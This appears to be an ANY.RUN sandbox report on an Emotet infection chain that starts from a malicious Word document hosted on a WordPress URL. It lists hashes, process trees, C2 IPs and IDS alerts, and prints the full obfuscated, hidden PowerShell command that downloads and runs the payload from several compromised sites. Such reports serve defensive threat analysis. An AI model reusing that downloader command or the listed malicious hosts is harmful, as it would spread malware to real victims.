analyze malware
  • Huge database of samples and IOCs
  • Custom VM setup
  • Unlimited submissions
  • Interactive approach
Sign up, it’s free
URL:

https://atomlines.com/demo/andywordpress/wp-content/payment/yz3ocshxn/1mzzdrn-32645675-361-lh46ru-zm3yhc5juppi/

Full analysis: https://app.any.run/tasks/0a50b87c-f447-46c3-ad0a-4deedf144b7c
Verdict: Malicious activity
Threats:

Emotet is one of the most dangerous trojans ever created. Over the course of its lifetime, it was upgraded to become a very destructive malware. It targets mostly corporate victims but even private users get infected in mass spam email campaigns.

Analysis date: January 17, 2020, 16:27:20
OS: Windows 7 Professional Service Pack 1 (build: 7601, 32 bit)
Tags:
emotet-doc
emotet
loader
trojan
stealer
Indicators:
MD5:

90D0099D4793C2741F86B70FFD120907

SHA1:

AF172F932C47591857033A29EA610E08A0C32321

SHA256:

36E8DDA2EE0D132BF8CB45ED2D298D2DDCD0B342F8D0995FD9A29EE14961FDC3

SSDEEP:

3:N8x17AIKjqSK/AVYAQuc9TG3XSTj0ID7Tr/MKn:27E3jqSK4VYAKyA0Ar/MK

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.
  • MALICIOUS

    • Drops known malicious document

      • opera.exe (PID: 3952)
    • Application was dropped or rewritten from another process

      • 858.exe (PID: 3920)
      • 858.exe (PID: 2140)
      • serialfunc.exe (PID: 2456)
      • serialfunc.exe (PID: 2368)
      • serialfunc.exe (PID: 2900)
      • serialfunc.exe (PID: 3704)
    • EMOTET was detected

      • serialfunc.exe (PID: 2456)
      • serialfunc.exe (PID: 3704)
    • Downloads executable files from the Internet

      • Powershell.exe (PID: 3656)
    • Connects to CnC server

      • serialfunc.exe (PID: 2456)
      • serialfunc.exe (PID: 3704)
    • Emotet process was detected

      • 858.exe (PID: 2140)
    • Changes the autorun value in the registry

      • serialfunc.exe (PID: 2456)
      • serialfunc.exe (PID: 3704)
  • SUSPICIOUS

    • Creates files in the user directory

      • Powershell.exe (PID: 3656)
    • Executable content was dropped or overwritten

      • Powershell.exe (PID: 3656)
      • 858.exe (PID: 2140)
    • PowerShell script executed

      • Powershell.exe (PID: 3656)
    • Executed via WMI

      • Powershell.exe (PID: 3656)
    • Starts itself from another location

      • 858.exe (PID: 2140)
    • Connects to server without host name

      • serialfunc.exe (PID: 2456)
      • serialfunc.exe (PID: 3704)
  • INFO

    • Changes internet zones settings

      • iexplore.exe (PID: 4060)
    • Application launched itself

      • iexplore.exe (PID: 4060)
    • Manual execution by user

      • opera.exe (PID: 3952)
      • WINWORD.EXE (PID: 3004)
      • IMEKLMG.EXE (PID: 2536)
      • IMEKLMG.EXE (PID: 2956)
      • serialfunc.exe (PID: 2900)
    • Reads internet explorer settings

      • iexplore.exe (PID: 2188)
    • Reads Internet Cache Settings

      • iexplore.exe (PID: 2188)
      • opera.exe (PID: 3952)
    • Creates files in the user directory

      • iexplore.exe (PID: 2188)
      • opera.exe (PID: 3952)
      • WINWORD.EXE (PID: 3004)
    • Reads Microsoft Office registry keys

      • WINWORD.EXE (PID: 3004)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.
No data.
screenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
99
Monitored processes
13
Malicious processes
8
Suspicious processes
0

Behavior graph

Click at the process to see the details
start drop and start drop and start iexplore.exe iexplore.exe opera.exe winword.exe no specs powershell.exe 858.exe no specs #EMOTET 858.exe serialfunc.exe no specs #EMOTET serialfunc.exe imeklmg.exe no specs imeklmg.exe no specs serialfunc.exe no specs #EMOTET serialfunc.exe

Process information

PID
CMD
Path
Indicators
Parent process
4060"C:\Program Files\Internet Explorer\iexplore.exe" "https://atomlines.com/demo/andywordpress/wp-content/payment/yz3ocshxn/1mzzdrn-32645675-361-lh46ru-zm3yhc5juppi/"C:\Program Files\Internet Explorer\iexplore.exe
explorer.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Internet Explorer
Exit code:
1
Version:
8.00.7600.16385 (win7_rtm.090713-1255)
2188"C:\Program Files\Internet Explorer\iexplore.exe" SCODEF:4060 CREDAT:71937C:\Program Files\Internet Explorer\iexplore.exe
iexplore.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
LOW
Description:
Internet Explorer
Exit code:
0
Version:
8.00.7600.16385 (win7_rtm.090713-1255)
3952"C:\Program Files\Opera\opera.exe" C:\Program Files\Opera\opera.exe
explorer.exe
User:
admin
Company:
Opera Software
Integrity Level:
MEDIUM
Description:
Opera Internet Browser
Exit code:
0
Version:
1748
3004"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\Desktop\REP_HQQ_010120_TVE_011720.doc"C:\Program Files\Microsoft Office\Office14\WINWORD.EXEexplorer.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft Word
Exit code:
1073807364
Version:
14.0.6024.1000
3656Powershell -w hidden -en JABEAGoAZgBwAHoAdQB4AGkAawBiAD0AJwBVAHUAZgBqAHgAdABoAGwAZwBoACcAOwAkAEUAcgBpAGsAYwBvAHEAeQBpACAAPQAgACcAOAA1ADgAJwA7ACQAWQB2AGUAcABsAGEAbABpAGoAbwBlAHkAPQAnAFkAYQBqAHIAYwBvAGYAbwBxAHcAZQB0AGUAJwA7ACQAVABzAG4AZABqAHcAdAB5AHIAPQAkAGUAbgB2ADoAdQBzAGUAcgBwAHIAbwBmAGkAbABlACsAJwBcACcAKwAkAEUAcgBpAGsAYwBvAHEAeQBpACsAJwAuAGUAeABlACcAOwAkAEMAdwBuAG4AdgBiAHkAdABzAHoAYgA9ACcASwBmAGEAbABjAHgAaQBrAHgAJwA7ACQATwBpAGgAaABuAGsAYgBhAGcAYQBkAGwAbgA9ACYAKAAnAG4AZQAnACsAJwB3AC0AbwBiAGoAZQAnACsAJwBjAHQAJwApACAATgBFAHQALgBXAEUAYgBDAGwASQBFAE4AdAA7ACQAVABuAG0AdABuAGcAcABhAGoAeQA9ACcAaAB0AHQAcAA6AC8ALwBuAGUAaQBsAHcAaQBsAGwAaQBhAG0AcwBvAG4ALgBjAGEALwBiAGEAYwBrAHUAcAAvAGsAeABXAEgALwAqAGgAdAB0AHAAcwA6AC8ALwB3AHcAdwAuAG4AZQB0AGsAYQBmAGUAbQAuAG8AcgBnAC8AdwBwAC0AYQBkAG0AaQBuAC8AbQBhAGkAbgB0AC8AdABrAHUANwBhAHgALwAqAGgAdAB0AHAAcwA6AC8ALwB3AHcAdwAuAHYAaQBiAGEAbQBhAHMAdABlAHIAYgBhAHQAYwBoAC4AYwBvAG0ALwBOAGUAdwBzAGwAZQB0AHQAZQByAC8AdQBhAHEAdABlAG0AeQAvACoAaAB0AHQAcABzADoALwAvAHAAaABvAGUAbgBpAHgAcwB0AG8AbgBlAGEAbgBkAGwAYQBtAGkAbgBhAHQAZQAuAGMAbwBtAC8AdwBwAC0AYwBvAG4AdABlAG4AdAAvAFkANgA0AFUAbgBxADQAVAAwAC8AKgBoAHQAdABwAHMAOgAvAC8AdABlAHgAYwBsAHUAYgBiAGQALgBjAG8AbQAvAHcAcAAtAGMAbwBuAHQAZQBuAHQALwAwAFYANABhAGoAeAAvACcALgAiAHMAcABgAEwAaQBUACIAKAAnACoAJwApADsAJABEAG8AawBmAGgAawByAHYAawB1AGgAcgA9ACcAWgB1AGEAaABxAHMAYgBqAGEAZAAnADsAZgBvAHIAZQBhAGMAaAAoACQAVwBsAGcAZwBnAGQAYwB5ACAAaQBuACAAJABUAG4AbQB0AG4AZwBwAGEAagB5ACkAewB0AHIAeQB7ACQATwBpAGgAaABuAGsAYgBhAGcAYQBkAGwAbgAuACIARABgAE8AVwBgAE4ATABPAEEAZABGAGAASQBsAGUAIgAoACQAVwBsAGcAZwBnAGQAYwB5ACwAIAAkAFQAcwBuAGQAagB3AHQAeQByACkAOwAkAFQAcgBnAHMAZABmAGcAdABqAGcAcgBzAGwAPQAnAEYAdQBqAGQAbwBqAGEAZABkACcAOwBJAGYAIAAoACgALgAoACcARwBlAHQALQBJACcAKwAnAHQAZQAnACsAJwBtACcAKQAgACQAVABzAG4AZABqAHcAdAB5AHIAKQAuACIAbABFAGAATgBnAGAAVABIACIAIAAtAGcAZQAgADIANgAxADgANgApACAAewBbAEQAaQBhAGcAbgBvAHMAdABpAGMAcwAuAFAAcgBvAGMAZQBzAHMAXQA6ADoAIgBzAHQAYABBAHIAdAAiACgAJABUAHMAbgBkAGoAdwB0AHkAcgApADsAJABYAHMAdABuAGcAdgBsAHIAYQA9ACcAUgBiAGsAeABiAHMAZABoAHYAaQBsAHYAJwA7AGIAcgBlAGEAawA7ACQAQQB2AGwAdABuAGQAawBiAHgAagBiAD0AJwBLAHcAYQBxAGcAcgBjAHMAYgBkAG0AegAnAH0AfQBjAGEAdABjAGgAewB9AH0AJABBAGcAeQBsAHcAZQB3AGcAYQB6AHkAbQBsAD0AJwBFAGEAdgBsAHkAcwBrAHYAcwBlAGUAJwA=C:\Windows\System32\WindowsPowerShell\v1.0\Powershell.exe
wmiprvse.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Exit code:
0
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
3920"C:\Users\admin\858.exe" C:\Users\admin\858.exePowershell.exe
User:
admin
Integrity Level:
MEDIUM
Description:
PromptEdit_Demo MFC Application
Exit code:
0
Version:
1, 0, 0, 1
2140--e90241f9C:\Users\admin\858.exe
858.exe
User:
admin
Integrity Level:
MEDIUM
Description:
PromptEdit_Demo MFC Application
Exit code:
0
Version:
1, 0, 0, 1
2368"C:\Users\admin\AppData\Local\serialfunc\serialfunc.exe"C:\Users\admin\AppData\Local\serialfunc\serialfunc.exe858.exe
User:
admin
Integrity Level:
MEDIUM
Description:
PromptEdit_Demo MFC Application
Exit code:
0
Version:
1, 0, 0, 1
2456--d6864438C:\Users\admin\AppData\Local\serialfunc\serialfunc.exe
serialfunc.exe
User:
admin
Integrity Level:
MEDIUM
Description:
PromptEdit_Demo MFC Application
Exit code:
1073807364
Version:
1, 0, 0, 1
2536"C:\Program Files\Common Files\microsoft shared\IME14\SHARED\IMEKLMG.EXE" /SetPreload /JPN /LogC:\Program Files\Common Files\microsoft shared\IME14\SHARED\IMEKLMG.EXEExplorer.EXE
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft Office IME 2010
Exit code:
1
Version:
14.0.4734.1000
Total events
3 195
Read events
2 125
Write events
0
Delete events
0

Modification events

No data
Executable files
2
Suspicious files
34
Text files
18
Unknown types
13

Dropped files

PID
Process
Filename
Type
4060iexplore.exeC:\Users\admin\AppData\Local\Temp\~DF03AACB2FAAB7E5AF.TMP
MD5:
SHA256:
4060iexplore.exeC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\LH043OAM\favicon[1].ico
MD5:
SHA256:
4060iexplore.exeC:\Users\admin\AppData\LocalLow\Microsoft\Internet Explorer\Services\search_{0633EE93-D776-472f-A0FF-E1416B8B2E3A}.ico
MD5:
SHA256:
4060iexplore.exeC:\Users\admin\AppData\Local\Temp\~DF1E320E4F9B422547.TMP
MD5:
SHA256:
4060iexplore.exeC:\Users\admin\AppData\Local\Microsoft\Internet Explorer\Recovery\Active\RecoveryStore.{44D05C85-3946-11EA-AB41-5254004A04AF}.dat
MD5:
SHA256:
3952opera.exeC:\Users\admin\AppData\Roaming\Opera\Opera\opr5965.tmp
MD5:
SHA256:
3952opera.exeC:\Users\admin\AppData\Roaming\Opera\Opera\opr5995.tmp
MD5:
SHA256:
3952opera.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\UDRELETTKZ5J6J6XOMLI.temp
MD5:
SHA256:
3952opera.exeC:\Users\admin\AppData\Roaming\Opera\Opera\operaprefs.initext
MD5:9DC54AC94813D88D3A0C2C1A5F60EA59
SHA256:1295BE441A6709184C0A46BDFF1A7DB039F124E5B12CB78DA8B12D3740AFAE2A
2188iexplore.exeC:\Users\admin\AppData\Local\Temp\Low\JavaDeployReg.logtext
MD5:96D5F8D1C0C1931340BDB3201D39D5A6
SHA256:E7295D4ADEEB85641700A6C216B03507A080EF6692824AB284B62A4DFD085ED8
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
33
TCP/UDP connections
176
DNS requests
203
Threats
0

HTTP requests

PID
Process
Method
HTTP Code
IP
URL
CN
Type
Size
Reputation
3952
opera.exe
GET
200
185.26.182.94:443
https://certs.opera.com/03/ev-oids.xml
unknown
xml
88.1 Kb
whitelisted
3656
Powershell.exe
GET
200
208.91.198.220:80
http://neilwilliamson.ca/backup/kxWH/
US
executable
332 Kb
suspicious
3952
opera.exe
GET
200
185.26.182.94:443
https://certs.opera.com/03/repository.xml
unknown
xml
41.5 Kb
whitelisted
2456
serialfunc.exe
POST
200
100.6.23.40:80
http://100.6.23.40/qbDP67Hi9r9jCc0Q
US
binary
1.38 Mb
malicious
2456
serialfunc.exe
POST
200
91.236.4.234:443
http://91.236.4.234:443/T6TxmLb2sgrq
PL
binary
148 b
malicious
2456
serialfunc.exe
POST
200
91.236.4.234:443
http://91.236.4.234:443/T6TxmLb2sgrq
PL
binary
148 b
malicious
2456
serialfunc.exe
POST
200
100.6.23.40:80
http://100.6.23.40/T6TxmLb2sgrq
US
binary
148 b
malicious
3952
opera.exe
GET
200
165.227.242.25:443
https://atomlines.com/demo/andywordpress/wp-content/payment/yz3ocshxn/1mzzdrn-32645675-361-lh46ru-zm3yhc5juppi/
US
document
251 Kb
unknown
2456
serialfunc.exe
POST
200
91.236.4.234:443
http://91.236.4.234:443/exdsd6uWcV7btG
PL
binary
4.52 Kb
malicious
2456
serialfunc.exe
POST
200
91.236.4.234:443
http://91.236.4.234:443/T6TxmLb2sgrq
PL
binary
148 b
malicious
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID
Process
IP
Domain
ASN
CN
Reputation
4060
iexplore.exe
204.79.197.200:80
www.bing.com
Microsoft Corporation
US
whitelisted
2456
serialfunc.exe
91.236.4.234:443
FHU Climax Rafal Kraj
PL
malicious
2456
serialfunc.exe
194.25.134.114:993
secureimap.t-online.de
Deutsche Telekom AG
DE
unknown
4060
iexplore.exe
13.107.21.200:80
www.bing.com
Microsoft Corporation
US
whitelisted
2188
iexplore.exe
165.227.242.25:443
atomlines.com
US
unknown
2456
serialfunc.exe
96.22.246.161:110
pop.videotron.ca
Videotron Telecom Ltee
CA
unknown
3952
opera.exe
165.227.242.25:443
atomlines.com
US
unknown
2456
serialfunc.exe
212.227.15.132:995
pop.1and1.es
1&1 Internet SE
DE
unknown
2456
serialfunc.exe
100.6.23.40:80
MCI Communications Services, Inc. d/b/a Verizon Business
US
malicious
2456
serialfunc.exe
64.233.167.109:995
pop.gmail.com
Google Inc.
US
whitelisted

DNS requests

Domain
IP
Reputation
atomlines.com
  • 165.227.242.25
unknown
www.bing.com
  • 204.79.197.200
  • 13.107.21.200
whitelisted
certs.opera.com
  • 185.26.182.94
  • 185.26.182.93
whitelisted
sitecheck2.opera.com
  • 185.26.182.111
  • 185.26.182.112
  • 185.26.182.94
  • 185.26.182.93
whitelisted
neilwilliamson.ca
  • 208.91.198.220
suspicious
ia.kvj.z
unknown
mi.gt.z
unknown
scr.misv.o
unknown
ia.esr.o
unknown
p1ia.alm.o
unknown

Threats

PID
Process
Class
Message
3656
Powershell.exe
Potential Corporate Privacy Violation
ET POLICY PE EXE or DLL Windows file download HTTP
3656
Powershell.exe
Potentially Bad Traffic
ET INFO Executable Retrieved With Minimal HTTP Headers - Potential Second Stage Download
3656
Powershell.exe
Misc activity
ET INFO EXE - Served Attached HTTP
2456
serialfunc.exe
A Network Trojan was detected
ET TROJAN Win32/Emotet CnC Activity (POST) M5
2456
serialfunc.exe
A Network Trojan was detected
ET TROJAN Win32/Emotet CnC Activity (POST) M6
2456
serialfunc.exe
A Network Trojan was detected
MALWARE [PTsecurity] Feodo/Emotet
2456
serialfunc.exe
A Network Trojan was detected
MALWARE [PTsecurity] Feodo/Emotet
2456
serialfunc.exe
Potentially Bad Traffic
ET POLICY HTTP traffic on port 443 (POST)
2456
serialfunc.exe
A Network Trojan was detected
ET TROJAN Win32/Emotet CnC Activity (POST) M5
2456
serialfunc.exe
A Network Trojan was detected
ET TROJAN Win32/Emotet CnC Activity (POST) M6
No debug info